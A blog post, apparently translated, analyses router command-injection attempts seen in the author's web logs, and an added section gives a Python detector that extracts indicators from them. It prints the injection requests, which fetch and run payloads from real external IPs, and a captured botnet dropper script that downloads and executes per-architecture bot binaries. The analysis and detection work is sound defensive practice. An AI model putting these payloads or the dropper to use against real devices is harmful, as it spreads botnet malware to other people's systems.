Sunday, August 26, 2018

Learning about system vulnerabilities from web logs, part 23

After restricting the HTTP request methods the flies have thinned out a lot, but there is still one I haven't worked out how to block yet; every day a pile of random IPs, and I can't even tell whether they are real.

:
156.202.37.153 - - [18/Aug/2018:18:44:30 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 226 "-" "LMAO/2.0"
:
183.102.221.196 - - [19/Aug/2018:15:17:44 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"

:
188.18.206.66 - - [20/Aug/2018:08:51:14 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 226 "-" "LMAO/2.0"
:
156.222.206.186 - - [21/Aug/2018:19:13:30 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
:
77.253.229.136 - - [22/Aug/2018:10:23:04 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 226 "-" "Shinka/1.0"
:
156.219.191.255 - - [23/Aug/2018:09:21:07 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
:
178.46.62.239 - - [24/Aug/2018:12:34:40 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 226 "-" "Shinka/1.0"
:
94.50.156.196 - - [25/Aug/2018:16:42:58 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 226 "-" "Shinka/1.0"
:
1.54.160.147 - - [26/Aug/2018:10:13:54 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
:
:

I grabbed one of the things the intruder wanted me to download at random; it is just "download, change the permissions, then execute a specific program":
# One bot binary per CPU architecture; the one matching the target runs, the others fail to exec
n="hakai.arm hakai.arm7 hakai.mips hakai.mpsl"
http_server="148.72.176.78"
# Candidate writable directories (tmpfs or world-writable on most routers)
dirs="/tmp/ /dev/ /dev/shm/ /var/ /var/run/ /var/tmp/"

# Probe each directory by creating $dir.file (e.g. /tmp/.file) and cd into it if that
# worked, so the loop ends in the last writable directory of the list
for dir in $dirs
do
>$dir.file && cd $dir
done

for i in $n
do
cp $SHELL $i        # copy the shell binary so the file already exists with executable mode bits
>$i                 # truncate it to zero length
chmod 777 $i
wget http://$http_server/$i -O- >$i   # overwrite it with the downloaded bot
chmod 777 $i
./$i                # run it; a wrong-architecture binary simply fails and the loop moves on
done
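
Added example, not code from the original post: a small Python detector that parses the access-log lines quoted above (combined log format, as written by Apache or nginx), URL-decodes the cli parameter, flags the quote-break followed by ;wget as a shell command injection, and extracts what a defender actually wants from each hit: the host serving the payload, the drop path, and the User-Agent. It also expands the dropper quoted above into the stage-2 URLs it would fetch. Two things worth reading off the log itself: every one of these requests got "400 226", and 226 bytes is the size of Apache's stock 400 Bad Request page, so the web server rejected the request before anything application-side saw it (a common cause is that such scanners send HTTP/1.1 without a Host header, though the log does not show the headers). And the source IPs never repeat while the payload hosts and User-Agents do, so a block rule should key on the decoded query pattern rather than on addresses. The benign line from 203.0.113.7 and the DROPPER_HEAD snippet are constructed from the material on this page.

```python
"""Decode the login.cgi hits quoted above, flag the injection, and pull out the IOCs.

Added example, not code from the original post. Parses Apache/nginx combined-format
access logs and expands the dropper's variable block into its stage-2 URLs. The
benign line from 203.0.113.7 is constructed for contrast.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Combined log format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# After URL-decoding: a shell separator followed by a downloader, i.e. the payload has
# broken out of the quoted cli argument and is chaining its own commands.
INJECT_RE = re.compile(r"[;|`]\s*(?:wget|curl|tftp|busybox)\b|\$\(")
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s;'\"]+")
DROP_RE = re.compile(r"(?:-O|>)\s*(/[^\s;'\"]+)")   # wget -O /tmp/x  or  -O - > /tmp/x

# Constructed sample: five of the lines quoted above plus one benign request.
SAMPLE_LOG = r'''
156.202.37.153 - - [18/Aug/2018:18:44:30 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 226 "-" "LMAO/2.0"
183.102.221.196 - - [19/Aug/2018:15:17:44 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 226 "-" "Gemini/2.0"
156.222.206.186 - - [21/Aug/2018:19:13:30 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
77.253.229.136 - - [22/Aug/2018:10:23:04 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 226 "-" "Shinka/1.0"
1.54.160.147 - - [26/Aug/2018:10:13:54 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 226 "-" "Hakai/2.0"
203.0.113.7 - - [26/Aug/2018:10:20:01 +0800] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
'''
# Constructed: the two assignments that matter from the dropper quoted above.
DROPPER_HEAD = 'n="hakai.arm hakai.arm7 hakai.mips hakai.mpsl"\nhttp_server="148.72.176.78"\n'

def parse_line(line):
    """Split one combined-format line into named fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def decode_query(target):
    """{param: URL-decoded value} for the request target. Splits only on '&':
    parse_qsl in older Pythons also splits on ';', which would shred the payload."""
    if "?" not in target:
        return {}
    params = {}
    for pair in target.split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params

def extract_iocs(value):
    """Download URL, the host serving it, and the path the payload is written to."""
    url = URL_RE.search(value)
    drop = DROP_RE.search(value)
    host = url.group(0).split("//", 1)[1].split("/", 1)[0] if url else None
    return {"url": url.group(0) if url else None, "payload_host": host,
            "drop_path": drop.group(1) if drop else None}

def scan_log(text):
    """One record per request whose query string carries a shell command injection."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for param, value in decode_query(rec["target"]).items():
            if INJECT_RE.search(value):
                hit = {"ip": rec["ip"], "ua": rec["ua"], "status": rec["status"],
                       "param": param, "decoded": value}
                hit.update(extract_iocs(value))
                hits.append(hit)
                break
    return hits

def summarize(hits):
    """The source IPs are one-shot infected hosts, so count what repeats instead:
    the payload hosts and the User-Agents (here the bot family names)."""
    return {"sources": len({h["ip"] for h in hits}),
            "payload_hosts": Counter(h["payload_host"] for h in hits),
            "user_agents": Counter(h["ua"] for h in hits)}

def dropper_targets(script):
    """Stage-2 URLs a dropper like the one above fetches: it reads n="..." and
    http_server="..." and requests http://$http_server/$i for each name in $n."""
    assigned = dict(re.findall(r'^(\w+)="([^"]*)"', script, re.M))
    return [f"http://{assigned['http_server']}/{name}" for name in assigned["n"].split()]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["ua"], h["payload_host"], h["drop_path"])
    print(summarize(found))
    print(dropper_targets(DROPPER_HEAD))
```

To run it over a real file, pass the file contents to scan_log(); the matching is done on the decoded value, so it makes no difference whether the scanner writes ";" or "%3B". Note also the dirs loop in the dropper: it tries /dev, /dev/shm, /var and /var/run as well as /tmp, so mounting /tmp noexec on its own does not stop this stage.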
